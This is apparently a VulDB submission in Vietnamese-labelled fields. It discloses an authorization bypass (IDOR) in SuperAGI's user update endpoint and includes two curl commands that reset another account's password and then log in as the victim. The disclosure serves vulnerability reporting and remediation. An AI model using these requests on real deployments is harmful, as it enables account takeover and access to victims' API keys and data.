| tiêu đề | SuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639) |
|---|
| Mô tả | # Technical Details
An Insecure Direct Object Reference (IDOR) exists in the `update_user` method in `superagi/controllers/user.py` of SuperAGI.
The application fails to verify that the requesting authenticated user has permission to modify the target user account. The endpoint only validates the JWT token via `Depends(check_auth)` but does not verify that the authenticated user matches the `user_id` in the URL.
# Vulnerable Code
File: superagi/controllers/user.py
Method: update_user (lines 117-144)
Why: The endpoint directly queries `User.id == user_id` without checking if the requesting user owns that account or shares the same organization. It then overwrites the victim's name, email, and password with attacker-supplied values.
# Reproduction
1. Authenticate with an attacker account and obtain a valid JWT.
2. Change the victim's password (user_id=2, different org):
curl -s -X PUT -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" "http://localhost:3000/api/users/update/2" -d '{"name":"Victim","email":"[email protected]","password":"attacker_controlled"}'
3. Log in as the victim using the new password:
curl -s -X POST "http://localhost:8001/login" -H "Content-Type: application/json" -d '{"email":"[email protected]","password":"attacker_controlled"}'
# Impact
- Account Takeover: Attacker changes any user's password and logs in as that user.
- Privilege Escalation: If admin users exist, attacker can take over admin accounts.
- Data Breach: Full access to victim's agents, API keys, configurations, and execution history.
|
|---|
| Nguồn | ⚠️ https://gist.github.com/YLChen-007/79b967ece52d424558f279156dd53324 |
|---|
| Người dùng | Eric-z (UID 95890) |
|---|
| Đệ trình | 27/03/2026 12:49 (cách đây 24 ngày) |
|---|
| Kiểm duyệt | 19/04/2026 07:41 (23 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 358219 [TransformerOptimus SuperAGI đến 0.0.14 User Update Endpoint user.py update_user user_id nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|